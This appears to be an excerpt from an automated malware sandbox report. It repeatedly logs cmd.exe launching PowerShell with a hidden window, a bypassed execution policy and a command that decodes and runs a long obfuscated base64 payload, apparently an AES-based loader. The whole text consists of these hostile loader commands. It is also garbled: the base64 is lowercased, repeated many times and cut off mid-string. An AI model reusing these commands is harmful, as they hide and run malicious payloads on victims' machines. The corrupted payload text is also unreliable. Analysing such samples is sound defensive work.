zzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnpkq0f0vlhkceldsm9ksfj3y3pvdkx6qjrnqzv6zem4nexuvlrmbkj6tvnjcccpksk7zw1wdhlzzxj2awnlcyatzxr3o1n0yxj0lvnszwvwic1tzwnvbmrzidu7znvuy3rpb24gewxjznhmzxrkd2pzzglykcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnqm9izg1ovwvzqutfuelbzdhjsetxvhfzc0jobtzknmzqaejwsnbsy3i4od0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj0l3zmx1dje0tfvqsg9zu0drmmlrvue9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gawjwegdtagp0d2tiz3pukcrwyxjhbv92yxipewljrvggjyr
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('suvykftuzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcow0nvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgnq21amwjttjbhvzl1suvga1pdmvhhvzvryjnkeljhvm1avzvrwlhkrmvhtnnkwe5wyji0z2v3b2djq0fny0dgevlxmg9daufnsunbz0ldqwdxm04wy21sdvoxmgtjr0ywyufvz0ldqwdluw9lq2lbz0ldqwtawghwyznscgjtzezlr05zzfhocgiynxpjrdbnujjwmexvmxdvsepswm1wevpxnwpau0i4suzobgjhvmpkqzfqww1wbfkzuwdmvvy0y0dgdvpgqnlim0jsy25snulfvjrzmngxyzjsdmjsqmhkr2dlsunbz0lhbg1jq2drwlhocgmzunbibwrgzudoc2rytnbimjv6sumxdwizumpimjuwwvdsdwn5qwtjr0ywyunrz2v3b2djq0fnsunbz0ldtwdrv1jwwtjsdmjtrwdieujryvhkbgrnt3pjbwx2su1pz2n5qmxlr05zzfhqrhrxvnpdaufnsunbz0ldqwdrv1jrtfuxd1vismxabvz5wlc1alptqxrswghqykhwemfxoxvvr0ywyunba2nhrjbhqw9nsunbz0ldqwdjrmr5yvhsbexvahzjm1fnswtwnfkyedfjoe9qynlcafphbgphvzl1wvdsae9pqwtjr0ywyunjs0ldqwdjsdbnwld4elptqjddaufnsunbz0ldqwdwm0pwzedvdfnhoxpkq0fpvhlca2fysmxktu96y21sdkldundzwfjvsudyrg9tqmxjm1reb1ncdvlytwdawghqykhwenc3vmxjetrpq2lbz0ldqjldbjblq2dwqlphuxrwmmx1wkc5m2mwumxabvz1wkdwevjyagpisfz6yvc5duldmxdzwfjvsunkre9sd2ldz29lskhkbfoxqmhkr2dnufnbavnfde1uvhbjvta5r1zgzejva1zjvfdsamntoxpimlowwezkcgjtunzkm05jutnwewntvnvkrlpsy25ocgiynwnvrzlzyvdocfpytmnvm2x6zedwdelnb2tjbvzuvg1gdfptqtljq0peyji1elpxntbvsep2ylhcmfftvm9zwfpwyjnkqlphmxbiaullskhkbfoxwmhisfzssuqwz01bb0tdbwxtsunndgjtotbjq2hvwlhomexwqmhkr2dnskhkbfoxqmhkr2dws1ncn0npqwdjq0jpwlhjdfnyumxiu0f0vudgmgfdqwtjbvzuvudgmgfdqxrsbtl5wtjvs2zrb0tdbe5szemxsmrhvnrvsep2y0dwewria2dmvkjozednz0pismxamujozednz0xvnwhiv1vnskhkbfownwhiv1vntfzaagjivmxjq1j5wldkv1lxedfauw9lvjnkcgrhvxrtrzl6zenbavzvrkrjru52ym5sewiyd2dvrzl3vlzbz1fubhdzwe56wldrdulncfhjbwwwwlmxswiztjbjq0pet2lcqlphumxaqzrpq2c9pscpksk7awv4ichbvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkftdb252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj2fxvjrjq2hkym5admeyvxrwmlzpvw1wegrxvnp